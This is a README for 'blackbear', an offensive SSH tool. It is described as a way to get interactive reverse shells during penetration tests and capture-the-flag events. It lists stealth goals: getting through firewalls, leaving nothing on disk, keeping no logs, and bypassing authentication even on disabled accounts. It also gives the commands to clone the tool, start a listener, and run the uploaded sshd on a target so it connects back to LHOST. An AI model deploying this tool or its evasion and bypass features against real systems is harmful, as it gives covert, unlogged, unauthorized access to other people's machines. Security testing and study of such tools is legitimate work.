Do not use in production or on any public facing server. Use only in penetration testing context, while participating in capture the flag competitions or otherwise studying computer security.
Main goal is to have reliable interactive shell access (must be able to run top, sudo, screen, vi, etc) as opposed to crafted reverse shells meterpreter which allow basic commands but fail at interactive ones.
Secondary goal is to implement reverse ssh shell operation. This means than the server must be able to establish a tcp connection in addition to its ability to listen for incoming connections and vice versa. Once the server can connect to the client, the ssh protocols happens as usual so the client which received the connection gets a shell on the server.
As always, reverse shell operation is meant to bypass firewall with spotty (if any) egress filtering.
+ be able to run under any user account, must not require root or elevated privileges.
+ server must not touch the disk, host keys shall be generated on the fly (insecure), authorized keys and configuration must be encoded within the binary, no logging. Only /dev/urandom and other required device files shall be used.
+ must bypass any and all authentication mecanisms except public key authentication. Than is to be able to gain access even if ~/.ssh/authorized_keys does not exists, the account is disabled, the account has an invalid shell, etc.
+ zlib and openssl
Use and Download:
git clone https://github.com/Marc-andreLabonte/blackbear && cd blackbear
./ssh -i id_blackbearkey -r 0.0.0.0 -p 8022
Upload sshd binary on the target and run
connect back to you on port 8022 ./sshd -s LHOST -p 8022
You shall receive a shell with the priviledges of the account running sshd